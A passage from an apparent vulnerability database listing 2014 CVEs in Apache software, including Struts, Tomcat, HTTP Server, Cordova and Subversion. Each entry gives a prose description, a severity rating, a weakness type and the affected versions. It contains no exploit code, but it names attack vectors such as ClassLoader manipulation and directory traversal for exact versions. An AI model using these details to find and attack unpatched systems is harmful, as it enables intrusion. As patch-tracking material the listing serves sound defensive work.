apache cxf 2.4.0
apache cxf 2.5.2
apache cxf 2.7.10
apache cxf 2.7.3
apache cxf 2.4.6
apache cxf 2.7.2
apache cxf 2.6.11
apache cxf 2.4.5
apache cxf 2.6.4
apache cxf 2.6.7
apache cxf 2.5.0
apache cxf 2.5.5
apache cxf 2.6.12
apache cxf 2.5.6
apache cxf 2.6.5
apache cxf 2.5.3
apache cxf 2.4.7
apache cxf 2.6.1
apache cxf 2.4.1
apache cxf 2.4.3
apache cxf 2.7.1
apache cxf *
apache cxf 2.5.1
apache cxf 2.5.4
apache cxf 2.6.2
apache cxf 2.5.7
apache cxf 2.4.2
apache cxf 2.7.6
apache cxf 2.7.8
CVE-2014-0111 MEDIUM

Apache Syncope 1.0.0 before 1.0.9 and 1.1.0 before 1.1.7 allows remote administrators to execute arbitrary Java code via vectors related to Apache Commons JEXL expressions, "derived schema definition," "user / role templates," and "account links of resource mappings."

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-94,

Products Affected

Vendor Product Version
apache syncope *
CVE-2014-0112 HIGH

ParametersInterceptor in Apache Struts before 2.3.20 does not properly restrict access to the getClass method, which allows remote attackers to "manipulate" the ClassLoader and execute arbitrary code via a crafted request. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-0094.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache struts *
CVE-2014-0113 HIGH

CookieInterceptor in Apache Struts before 2.3.20, when a wildcard cookiesName value is used, does not properly restrict access to the getClass method, which allows remote attackers to "manipulate" the ClassLoader and execute arbitrary code via a crafted request. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-0094.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache struts *
CVE-2014-0114 HIGH

Apache Commons BeanUtils, as distributed in lib/commons-beanutils-1.8.0.jar in Apache Struts 1.x through 1.3.10 and in other products requiring commons-beanutils through 1.9.2, does not suppress the class property, which allows remote attackers to "manipulate" the ClassLoader and execute arbitrary code via the class parameter, as demonstrated by the passing of this parameter to the getClass method of the ActionForm object in Struts 1.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache struts 1.2.4
apache struts 1.2.7
apache struts 1.3.5
apache commons_beanutils *
apache struts 1.0.2
apache struts 1.2.9
apache struts 1.3.8
apache struts 1.2.2
apache struts 1.2.6
apache struts 1.3.10
apache struts 1.2.8
apache struts 1.1
apache struts 1.0
CVE-2014-0115 HIGH

Directory traversal vulnerability in the log viewer in Apache Storm 0.9.0.1 allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter to log.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache storm 0.9.0.1
CVE-2014-0116 MEDIUM

CookieInterceptor in Apache Struts 2.x before 2.3.20, when a wildcard cookiesName value is used, does not properly restrict access to the getClass method, which allows remote attackers to "manipulate" the ClassLoader and modify session state via a crafted request. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-0113.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache struts 2.0.2
apache struts 2.0.9
apache struts 2.3.14.1
apache struts 2.3.16.2
apache struts 2.1.5
apache struts 2.2.3.1
apache struts 2.2.1.1
apache struts 2.1.1
apache struts 2.2.1
apache struts 2.0.11.2
apache struts 2.0.11.1
apache struts 2.0.3
apache struts 2.3.15.2
apache struts 2.1.8
apache struts 2.0.13
apache struts 2.3.16.1
apache struts 2.0.12
apache struts 2.0.14
apache struts 2.0.0
apache struts 2.3.15.1
apache struts 2.3.4.1
apache struts 2.3.3
apache struts 2.0.6
apache struts 2.0.11
apache struts 2.3.1.1
apache struts 2.0.7
apache struts 2.3.14.2
apache struts 2.3.7
apache struts 2.0.8
apache struts 2.3.4
apache struts 2.0.1
apache struts 2.3.14.3
apache struts 2.3.15.3
apache struts 2.1.4
apache struts 2.3.1
apache struts 2.0.5
apache struts 2.3.12
apache struts 2.1.6
apache struts 2.3.8
apache struts 2.0.10
apache struts 2.1.8.1
apache struts 2.0.4
apache struts 2.1.0
apache struts 2.1.3
apache struts 2.3.15
apache struts 2.3.14
apache struts 2.1.2
apache struts 2.3.1.2
apache struts 2.2.3
apache struts 2.3.16
CVE-2014-0117 MEDIUM

The mod_proxy module in the Apache HTTP Server 2.4.x before 2.4.10, when a reverse proxy is enabled, allows remote attackers to cause a denial of service (child-process crash) via a crafted HTTP Connection header.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache http_server 2.4.7
apple mac_os_x *
apache http_server 2.4.8
apache http_server 2.4.9
apache http_server 2.4.6
CVE-2014-0118 MEDIUM

The deflate_in_filter function in mod_deflate.c in the mod_deflate module in the Apache HTTP Server before 2.4.10, when request body decompression is enabled, allows remote attackers to cause a denial of service (resource consumption) via crafted request data that decompresses to a much larger size.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-400,

Products Affected

Vendor Product Version
apache http_server *
redhat jboss_enterprise_application_platform 6.0.0
redhat jboss_enterprise_application_platform 6.4.0
debian debian_linux 7.0
debian debian_linux 8.0
CVE-2014-0119 MEDIUM

Apache Tomcat before 6.0.40, 7.x before 7.0.54, and 8.x before 8.0.6 does not properly constrain the class loader that accesses the XML parser used with an XSLT stylesheet, which allows remote attackers to (1) read arbitrary files via a crafted web application that provides an XML external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue, or (2) read files associated with different web applications on a single Tomcat instance via a crafted web application.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache tomcat 7.0.47
apache tomcat 8.0.0
apache tomcat 7.0.13
apache tomcat 7.0.39
apache tomcat 6.0
apache tomcat 6.0.7
apache tomcat 7.0.44
apache tomcat 6.0.1
apache tomcat 6.0.27
apache tomcat 7.0.12
apache tomcat 8.0.3
apache tomcat 6.0.8
apache tomcat 6.0.29
apache tomcat 7.0.41
apache tomcat 7.0.50
apache tomcat 6.0.12
apache tomcat 6.0.37
apache tomcat 7.0.28
apache tomcat 7.0.21
apache tomcat 7.0.33
apache tomcat 7.0.31
apache tomcat 6.0.36
apache tomcat 6.0.15
apache tomcat 7.0.3
apache tomcat 6.0.32
apache tomcat 7.0.40
apache tomcat 8.0.5
apache tomcat 6.0.4
apache tomcat 6.0.2
apache tomcat 7.0.17
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 6.0.5
apache tomcat 7.0.5
apache tomcat 7.0.0
apache tomcat 6.0.17
apache tomcat 7.0.32
apache tomcat 7.0.4
apache tomcat 6.0.28
apache tomcat 7.0.25
apache tomcat 7.0.36
apache tomcat 6.0.33
apache tomcat 7.0.38
apache tomcat 7.0.15
apache tomcat 7.0.37
apache tomcat 7.0.48
apache tomcat 7.0.42
apache tomcat 7.0.35
apache tomcat 6.0.13
apache tomcat 7.0.23
apache tomcat *
apache tomcat 7.0.9
apache tomcat 7.0.19
apache tomcat 7.0.43
apache tomcat 7.0.18
apache tomcat 7.0.46
apache tomcat 7.0.7
apache tomcat 7.0.29
apache tomcat 6.0.26
apache tomcat 6.0.6
apache tomcat 6.0.18
apache tomcat 7.0.34
apache tomcat 7.0.24
apache tomcat 6.0.31
apache tomcat 7.0.20
apache tomcat 6.0.20
apache tomcat 6.0.10
apache tomcat 7.0.14
apache tomcat 7.0.49
apache tomcat 6.0.30
apache tomcat 8.0.1
apache tomcat 6
apache tomcat 7.0.1
apache tomcat 7.0.45
apache tomcat 7.0.10
apache tomcat 7.0.6
apache tomcat 7.0.26
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 7.0.8
apache tomcat 7.0.27
apache tomcat 6.0.11
apache tomcat 7.0.2
apache tomcat 6.0.19
apache tomcat 7.0.52
apache tomcat 6.0.24
apache tomcat 6.0.9
apache tomcat 7.0.53
apache tomcat 7.0.22
apache tomcat 6.0.3
apache tomcat 7.0.30
apache tomcat 6.0.14
apache tomcat 6.0.35
CVE-2014-0212 MEDIUM

qpid-cpp: ACL policies are only loaded if the acl-file option is specified, enabling DoS by consuming all available file descriptors

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-400,

Products Affected

Vendor Product Version
apache qpid-cpp -
CVE-2014-0219 LOW

Apache Karaf before 4.0.10 enables a shutdown port on the loopback interface, which allows local users to cause a denial of service (shutdown) by sending a shutdown command to all listening high ports.

CVSS 2.0

Severity: LOW

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache karaf *
CVE-2014-0226 MEDIUM

Race condition in the mod_status module in the Apache HTTP Server before 2.4.10 allows remote attackers to cause a denial of service (heap-based buffer overflow), or possibly obtain sensitive credential information or execute arbitrary code, via a crafted request that triggers improper scoreboard handling within the status_handler function in modules/generators/mod_status.c and the lua_ap_scoreboard_worker function in modules/lua/lua_request.c.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-362,

Products Affected

Vendor Product Version
oracle enterprise_manager_ops_center 12.1.4
apache http_server *
oracle secure_global_desktop 4.71
oracle secure_global_desktop 5.0
redhat jboss_enterprise_application_platform 6.0.0
debian debian_linux 7.0
oracle http_server 11.1.1.7.0
oracle http_server 12.1.3.0
oracle enterprise_manager_ops_center 11.1.3
debian debian_linux 8.0
oracle secure_global_desktop 4.63
redhat jboss_enterprise_application_platform 6.4.0
oracle http_server 10.1.3.5.0
oracle secure_global_desktop 5.1
oracle http_server 12.1.2.0
CVE-2014-0227 MEDIUM

java/org/apache/coyote/http11/filters/ChunkedInputFilter.java in Apache Tomcat 6.x before 6.0.42, 7.x before 7.0.55, and 8.x before 8.0.9 does not properly handle attempts to continue reading data after an error has occurred, which allows remote attackers to conduct HTTP request smuggling attacks or cause a denial of service (resource consumption) by streaming data with malformed chunked transfer coding.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-19,

Products Affected

Vendor Product Version
apache tomcat 7.0.47
apache tomcat 8.0.0
apache tomcat 7.0.13
apache tomcat 7.0.39
apache tomcat 6.0.7
apache tomcat 7.0.44
apache tomcat 6.0.1
apache tomcat 6.0.27
apache tomcat 7.0.12
apache tomcat 8.0.3
apache tomcat 6.0.8
apache tomcat 6.0.29
apache tomcat 7.0.41
apache tomcat 7.0.50
apache tomcat 6.0.12
apache tomcat 6.0.37
apache tomcat 7.0.28
apache tomcat 7.0.21
apache tomcat 7.0.33
apache tomcat 7.0.31
apache tomcat 6.0.36
apache tomcat 6.0.15
apache tomcat 7.0.3
apache tomcat 6.0.32
apache tomcat 7.0.40
apache tomcat 8.0.5
apache tomcat 6.0.4
apache tomcat 6.0.2
apache tomcat 7.0.17
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 6.0.5
apache tomcat 7.0.5
apache tomcat 7.0.0
apache tomcat 6.0.17
apache tomcat 7.0.32
apache tomcat 7.0.4
apache tomcat 6.0.28
apache tomcat 7.0.25
apache tomcat 7.0.36
apache tomcat 6.0.33
apache tomcat 7.0.38
apache tomcat 7.0.15
apache tomcat 7.0.37
apache tomcat 7.0.48
apache tomcat 7.0.54
apache tomcat 7.0.42
apache tomcat 7.0.35
apache tomcat 6.0.13
apache tomcat 7.0.23
apache tomcat 7.0.9
apache tomcat 7.0.19
apache tomcat 7.0.43
apache tomcat 7.0.18
apache tomcat 6.0.39
apache tomcat 7.0.46
apache tomcat 7.0.7
apache tomcat 7.0.29
apache tomcat 6.0.26
apache tomcat 6.0.6
apache tomcat 6.0.18
apache tomcat 7.0.34
apache tomcat 7.0.24
apache tomcat 6.0.31
apache tomcat 7.0.20
apache tomcat 6.0.20
apache tomcat 6.0.10
apache tomcat 7.0.14
apache tomcat 7.0.49
apache tomcat 6.0.30
apache tomcat 8.0.1
apache tomcat 7.0.1
apache tomcat 7.0.45
apache tomcat 7.0.10
apache tomcat 7.0.6
apache tomcat 8.0.8
apache tomcat 7.0.26
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 7.0.8
apache tomcat 7.0.27
apache tomcat 6.0.11
apache tomcat 7.0.2
apache tomcat 6.0.19
apache tomcat 7.0.52
apache tomcat 6.0.24
apache tomcat 6.0.9
apache tomcat 7.0.53
apache tomcat 7.0.22
apache tomcat 6.0.3
apache tomcat 7.0.30
apache tomcat 6.0.14
apache tomcat 6.0.35
apache tomcat 6.0.41
CVE-2014-0228 LOW

Apache Hive before 0.13.1, when in SQL standards based authorization mode, does not properly check the file permissions for (1) import and (2) export statements, which allows remote authenticated users to obtain sensitive information via a crafted URI.

CVSS 2.0

Severity: LOW

Problem Type: CWE-284,

Products Affected

Vendor Product Version
apache hive *
CVE-2014-0229 MEDIUM

Apache Hadoop 0.23.x before 0.23.11 and 2.x before 2.4.1, as used in Cloudera CDH 5.0.x before 5.0.2, do not check authorization for the (1) refreshNamenodes, (2) deleteBlockPool, and (3) shutdownDatanode HDFS admin commands, which allows remote authenticated users to cause a denial of service (DataNodes shutdown) or perform unnecessary operations by issuing a command.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache hadoop 0.23.5
apache hadoop 2.0.5
apache hadoop 2.1.0
apache hadoop 0.23.4
apache hadoop 0.23.3
apache hadoop 2.1.1
cloudera cdh 5.0.0
apache hadoop 2.0.2
apache hadoop 0.23.8
apache hadoop 2.3.0
apache hadoop 0.23.10
apache hadoop 2.0.4
apache hadoop 0.23.7
apache hadoop 2.0.0
apache hadoop 2.4.0
apache hadoop 2.2.0
apache hadoop 0.23.0
apache hadoop 2.0.6
apache hadoop 2.0.3
apache hadoop 0.23.1
apache hadoop 0.23.9
apache hadoop 2.0.1
apache hadoop 0.23.6
CVE-2014-0230 HIGH

Apache Tomcat 6.x before 6.0.44, 7.x before 7.0.55, and 8.x before 8.0.9 does not properly handle cases where an HTTP response occurs before finishing the reading of an entire request body, which allows remote attackers to cause a denial of service (thread consumption) via a series of aborted upload attempts.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-399,

Products Affected

Vendor Product Version
apache tomcat 7.0.44
apache tomcat 6.0.43
oracle virtualization 5.1
apache tomcat 8.0.3
apache tomcat 6.0.29
apache tomcat 6.0.37
apache tomcat 7.0.33
apache tomcat 6.0.36
apache tomcat 7.0.3
apache tomcat 6.0.32
apache tomcat 7.0.40
apache tomcat 6.0.4
apache tomcat 6.0.2
apache tomcat 6.0.5
apache tomcat 7.0.5
apache tomcat 7.0.0
apache tomcat 7.0.32
apache tomcat 7.0.4
apache tomcat 6.0.28
apache tomcat 7.0.36
apache tomcat 6.0.33
apache tomcat 7.0.38
apache tomcat 6.0.13
apache tomcat 7.0.9
apache tomcat 7.0.43
apache tomcat 7.0.18
apache tomcat 7.0.7
apache tomcat 6.0.26
apache tomcat 6.0.18
apache tomcat 7.0.34
apache tomcat 7.0.24
apache tomcat 6.0.31
apache tomcat 6.0.20
apache tomcat 6.0.30
apache tomcat 7.0.1
apache tomcat 7.0.45
apache tomcat 7.0.6
apache tomcat 8.0.8
oracle virtualization 4.63
apache tomcat 7.0.8
apache tomcat 7.0.27
apache tomcat 6.0.24
apache tomcat 7.0.53
apache tomcat 6.0.3
apache tomcat 7.0.30
apache tomcat 6.0.14
apache tomcat 6.0.41
apache tomcat 7.0.47
apache tomcat 8.0.0
apache tomcat 7.0.13
apache tomcat 7.0.39
apache tomcat 6.0.7
apache tomcat 6.0.1
apache tomcat 6.0.27
apache tomcat 7.0.12
apache tomcat 6.0.8
apache tomcat 7.0.41
apache tomcat 7.0.50
apache tomcat 6.0.12
apache tomcat 7.0.28
apache tomcat 7.0.21
apache tomcat 7.0.31
apache tomcat 6.0.15
apache tomcat 8.0.5
apache tomcat 7.0.17
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 6.0.17
apache tomcat 7.0.25
apache tomcat 7.0.15
apache tomcat 7.0.37
apache tomcat 7.0.48
apache tomcat 7.0.54
apache tomcat 7.0.42
apache tomcat 7.0.35
apache tomcat 7.0.23
apache tomcat 7.0.19
apache tomcat 6.0.39
apache tomcat 7.0.46
apache tomcat 7.0.29
oracle virtualization 4.71
apache tomcat 6.0.6
apache tomcat 7.0.20
apache tomcat 6.0.10
apache tomcat 7.0.14
apache tomcat 7.0.49
apache tomcat 8.0.1
apache tomcat 7.0.10
apache tomcat 7.0.26
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 6.0.11
apache tomcat 7.0.2
apache tomcat 6.0.19
apache tomcat 7.0.52
apache tomcat 6.0.9
apache tomcat 7.0.22
apache tomcat 6.0.35
CVE-2014-0231 MEDIUM

The mod_cgid module in the Apache HTTP Server before 2.4.10 does not have a timeout mechanism, which allows remote attackers to cause a denial of service (process hang) via a request to a CGI script that does not read from its stdin file descriptor.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-399,

Products Affected

Vendor Product Version
apache http_server *
CVE-2014-0232 MEDIUM

Multiple cross-site scripting (XSS) vulnerabilities in framework/common/webcommon/includes/messages.ftl in Apache OFBiz 11.04.01 before 11.04.05 and 12.04.01 before 12.04.04 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors, which are not properly handled in a (1) result or (2) error message.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache ofbiz 11.04.03
apache ofbiz 11.04.01
apache ofbiz 11.04.04
apache ofbiz 12.04.03
apache ofbiz 12.04.02
apache ofbiz 11.04.02
apache ofbiz 12.04.01
CVE-2014-10022 MEDIUM

Apache Traffic Server before 5.1.2 allows remote attackers to cause a denial of service via unspecified vectors, related to internal buffer sizing.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-119,

Products Affected

Vendor Product Version
apache traffic_server *
CVE-2014-1881 HIGH

Apache Cordova 3.3.0 and earlier and Adobe PhoneGap 2.9.0 and earlier allow remote attackers to bypass intended device-resource restrictions of an event-based bridge via a crafted library clone that leverages IFRAME script execution and waits a certain amount of time for an OnJsPrompt handler return value as an alternative to correct synchronization.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-264,

Products Affected

Vendor Product Version
adobe phonegap *
apache cordova 3.2.0
adobe phonegap 2.7.0
apache cordova 3.1.0
adobe phonegap 2.1.0
adobe phonegap 2.0.0
adobe phonegap 2.4.0
apache cordova 3.0.0
apache cordova 3.3.0
adobe phonegap 2.8.1
adobe phonegap 2.8.0
adobe phonegap 2.6.0
adobe phonegap 2.5.0
adobe phonegap 2.2.0
adobe phonegap 2.3.0
adobe phonegap 2.9.0
apache cordova *
CVE-2014-1882 HIGH

Apache Cordova 3.3.0 and earlier and Adobe PhoneGap 2.9.0 and earlier allow remote attackers to bypass intended device-resource restrictions of an event-based bridge via a crafted library clone that leverages IFRAME script execution and directly accesses bridge JavaScript objects, as demonstrated by certain cordova.require calls.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-264,

Products Affected

Vendor Product Version
adobe phonegap *
apache cordova 3.2.0
adobe phonegap 2.7.0
apache cordova 3.1.0
adobe phonegap 2.1.0
adobe phonegap 2.0.0
adobe phonegap 2.4.0
apache cordova 3.0.0
apache cordova 3.3.0
adobe phonegap 2.8.1
adobe phonegap 2.8.0
adobe phonegap 2.6.0
adobe phonegap 2.5.0
adobe phonegap 2.2.0
adobe phonegap 2.3.0
adobe phonegap 2.9.0
apache cordova *
CVE-2014-1884 HIGH

Apache Cordova 3.3.0 and earlier and Adobe PhoneGap 2.9.0 and earlier on Windows Phone 7 and 8 do not properly restrict navigation events, which allows remote attackers to bypass intended device-resource restrictions via content that is accessed (1) in an IFRAME element or (2) with the XMLHttpRequest method by a crafted application.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-264,

Products Affected

Vendor Product Version
adobe phonegap *
apache cordova 3.2.0
adobe phonegap 2.7.0
apache cordova 3.1.0
adobe phonegap 2.1.0
adobe phonegap 2.0.0
adobe phonegap 2.4.0
apache cordova 3.0.0
apache cordova 3.3.0
adobe phonegap 2.8.1
adobe phonegap 2.8.0
adobe phonegap 2.6.0
adobe phonegap 2.5.0
adobe phonegap 2.2.0
adobe phonegap 2.3.0
adobe phonegap 2.9.0
apache cordova *
CVE-2014-1972 HIGH

Apache Tapestry before 5.3.6 relies on client-side object storage without checking whether a client has modified an object, which allows remote attackers to cause a denial of service (resource consumption) or execute arbitrary code via crafted serialized data.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-399,

Products Affected

Vendor Product Version
apache tapestry *
CVE-2014-2668 MEDIUM

Apache CouchDB 1.5.0 and earlier allows remote attackers to cause a denial of service (CPU and memory consumption) via the count parameter to /_uuids.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache couchdb *
CVE-2014-3500 MEDIUM

Apache Cordova Android before 3.5.1 allows remote attackers to change the start page via a crafted intent URL.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-17,

Products Affected

Vendor Product Version
apache cordova *
CVE-2014-3501 MEDIUM

Apache Cordova Android before 3.5.1 allows remote attackers to bypass the HTTP whitelist and connect to arbitrary servers by using JavaScript to open WebSocket connections through WebView.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-254,

Products Affected

Vendor Product Version
apache cordova 3.5.0
CVE-2014-3502 MEDIUM

Apache Cordova Android before 3.5.1 allows remote attackers to open and send data to arbitrary applications via a URL with a crafted URI scheme for an Android intent.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache cordova 3.5.0
CVE-2014-3503 MEDIUM

Apache Syncope 1.1.x before 1.1.8 uses weak random values to generate passwords, which makes it easier for remote attackers to guess the password via a brute force attack.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-310,

Products Affected

Vendor Product Version
apache syncope 1.1.7
apache syncope 1.1.2
apache syncope 1.1.1
apache syncope 1.1.3
apache syncope 1.1.4
apache syncope 1.1.6
apache syncope 1.1.0
apache syncope 1.1.5
CVE-2014-3504 MEDIUM

The (1) serf_ssl_cert_issuer, (2) serf_ssl_cert_subject, and (3) serf_ssl_cert_certificate functions in Serf 0.2.0 through 1.3.x before 1.3.7 do not properly handle a NUL byte in a domain name in the subject's Common Name (CN) field of an X.509 certificate, which allows man-in-the-middle attackers to spoof arbitrary SSL servers via a crafted certificate issued by a legitimate Certification Authority.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
serf_project serf 1.0.3
apache subversion 1.4.0
apache subversion 1.6.18
serf_project serf 0.6.0
apache subversion 1.8.0
apache subversion 1.8.8
apache subversion 1.6.6
apache subversion 1.5.3
serf_project serf 0.6.1
serf_project serf 0.3.0
apache subversion 1.6.11
apache subversion 1.7.11
apache subversion 1.5.0
apache subversion 1.5.1
apache subversion 1.6.2
serf_project serf 1.0.2
apache subversion 1.7.4
apache subversion 1.5.6
serf_project serf 1.3.5
apache subversion 1.6.17
serf_project serf 0.7.2
apache subversion 1.8.6
serf_project serf 1.2.1
apache subversion 1.4.3
serf_project serf 1.1.1
serf_project serf 1.2.0
apache subversion 1.6.20
apache subversion 1.7.5
serf_project serf 0.7.1
apache subversion 1.6.12
serf_project serf 0.3.1
serf_project serf 1.3.0
apache subversion 1.6.13
apache subversion 1.7.12
apache subversion 1.6.3
apache subversion 1.7.15
apache subversion 1.8.7
serf_project serf 1.3.4
apache subversion 1.6.5
apache subversion 1.5.8
apache subversion 1.6.15
serf_project serf 1.3.3
apache subversion 1.6.14
apache subversion 1.7.7
apache subversion 1.7.3
apache subversion 1.5.5
apache subversion 1.6.21
apache subversion 1.8.2
apache subversion 1.5.7
apache subversion 1.7.14
serf_project serf 0.7.0
apache subversion 1.8.4
apache subversion 1.8.9
serf_project serf 1.3.1
apache subversion 1.6.0
apache subversion 1.6.16
apache subversion 1.7.8
serf_project serf 1.0.1
apache subversion 1.5.2
apache subversion 1.8.1
canonical ubuntu_linux 12.04
apache subversion 1.6.4
apache subversion 1.6.8
apache subversion 1.6.9
serf_project serf 0.5.0
canonical ubuntu_linux 14.04
apache subversion 1.7.6
apache subversion 1.6.19
apache subversion 1.7.9
apache subversion 1.7.13
apache subversion 1.5.4
serf_project serf 1.0.0
apache subversion 1.6.23
apache subversion 1.7.16
apache subversion 1.4.2
apache subversion 1.4.6
apache subversion 1.7.1
apache subversion 1.8.5
apache subversion 1.4.5
serf_project serf 1.3.6
serf_project serf 0.2.0
apache subversion 1.6.7
apache subversion 1.8.3
apache subversion 1.4.4
apache subversion 1.7.10
serf_project serf 0.4.0
apache subversion 1.6.10
serf_project serf 1.3.2
apache subversion 1.6.1
apache subversion 1.7.17
apache subversion 1.7.0
apache subversion 1.7.2
serf_project serf 1.1.0
apache subversion 1.4.1
CVE-2014-3522 MEDIUM

The Serf RA layer in Apache Subversion 1.4.0 through 1.7.x before 1.7.18 and 1.8.x before 1.8.10 does not properly handle wildcards in the Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof servers via a crafted certificate.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-297,

Products Affected

Vendor Product Version
apache subversion 1.4.0
apache subversion 1.6.18
apache subversion 1.8.0
apache subversion 1.8.8
apache subversion 1.6.6
apache subversion 1.5.3
apache subversion 1.6.11
apache subversion 1.7.11
apache subversion 1.5.0
apache subversion 1.5.1
apache subversion 1.6.2
apache subversion 1.7.4
apple xcode 6.1.1
apache subversion 1.5.6
apache subversion 1.6.17
apache subversion 1.8.6
apache subversion 1.4.3
apache subversion 1.6.20
apache subversion 1.7.5
apache subversion 1.6.12
opensuse opensuse 12.3
apache subversion 1.6.13
apache subversion 1.7.12
apache subversion 1.6.3
apache subversion 1.7.15
apache subversion 1.8.7
apache subversion 1.6.5
apache subversion 1.5.8
apache subversion 1.6.15
apache subversion 1.6.14
apache subversion 1.7.7
apache subversion 1.7.3
apache subversion 1.5.5
apache subversion 1.6.21
apache subversion 1.8.2
apache subversion 1.5.7
apache subversion 1.7.14
apache subversion 1.8.4
apache subversion 1.8.9
apache subversion 1.6.0
apache subversion 1.6.16
apache subversion 1.7.8
apache subversion 1.5.2
apache subversion 1.8.1
canonical ubuntu_linux 12.04
apache subversion 1.6.4
apache subversion 1.6.8
apache subversion 1.6.9
canonical ubuntu_linux 14.04
apache subversion 1.7.6
opensuse opensuse 13.1
apache subversion 1.6.19
apache subversion 1.7.9
apache subversion 1.7.13
apache subversion 1.5.4
apache subversion 1.6.23
apache subversion 1.7.16
apache subversion 1.4.2
apache subversion 1.4.6
apache subversion 1.7.1
apache subversion 1.8.5
apache subversion 1.4.5
apache subversion 1.6.7
apache subversion 1.8.3
apache subversion 1.4.4
apache subversion 1.7.10
apache subversion 1.6.10
apache subversion 1.6.1
apache subversion 1.7.17
apache subversion 1.7.0
apache subversion 1.7.2
apache subversion 1.4.1
CVE-2014-3523 MEDIUM

Memory leak in the winnt_accept function in server/mpm/winnt/child.c in the WinNT MPM in the Apache HTTP Server 2.4.x before 2.4.10 on Windows, when the default AcceptFilter is enabled, allows remote attackers to cause a denial of service (memory consumption) via crafted requests.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-399,

Products Affected

Vendor Product Version
apache http_server 2.4.3
apache http_server 2.4.7
apache http_server 2.4.1
apache http_server 2.4.8
apache http_server 2.4.9
apache http_server 2.4.2
apache http_server 2.4.6
apache http_server 2.4.4
CVE-2014-3524 HIGH

Apache OpenOffice before 4.1.1 allows remote attackers to execute arbitrary commands and possibly have other unspecified impact via a crafted Calc spreadsheet.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-77,

Products Affected

Vendor Product Version
apache openoffice *
libreoffice libreoffice *
CVE-2014-3525 HIGH

Unspecified vulnerability in Apache Traffic Server 3.x through 3.2.5, 4.x before 4.2.1.1, and 5.x before 5.0.1 has unknown impact and attack vectors, possibly related to health checks.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache traffic_server 2.1.1
apache traffic_server 3.0.1
apache traffic_server 3.2.0
apache traffic_server 3.3.2
apache traffic_server 2.1.8
apache traffic_server 3.0.0
apache traffic_server 3.3.4
apache traffic_server 4.0.1
apache traffic_server 4.2.0
apache traffic_server 3.1.0
apache traffic_server 2.0.0
apache traffic_server 2.1.5
apache traffic_server 2.1.3
apache traffic_server 3.1.3
apache traffic_server 2.1.9
apache traffic_server 3.1.4
apache traffic_server 5.0.0
apache traffic_server 3.1.2
apache traffic_server 3.3.1
apache traffic_server 2.1.2
apache traffic_server 2.0.1
apache traffic_server 3.0.4
apache traffic_server 3.3.5
apache traffic_server 2.1.7
apache traffic_server 3.0.3
apache traffic_server 3.1.1
apache traffic_server 2.1.6
apache traffic_server 3.3.0
apache traffic_server 3.0.2
apache traffic_server 3.3.3
apache traffic_server 2.1.4
apache traffic_server 2.1.0
apache traffic_server 4.1.0
apache traffic_server 4.2.1
CVE-2014-3526 MEDIUM

Apache Wicket before 1.5.12, 6.x before 6.17.0, and 7.x before 7.0.0-M3 might allow remote attackers to obtain sensitive information via vectors involving identifiers for storing page markup for temporary user sessions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache wicket 6.8.0
apache wicket 6.10.0
apache wicket 6.9.0
apache wicket 6.15.0
apache wicket *
apache wicket 6.7.0
apache wicket 6.2.0
apache wicket 6.1.0
apache wicket 6.5.0
apache wicket 7.0.0
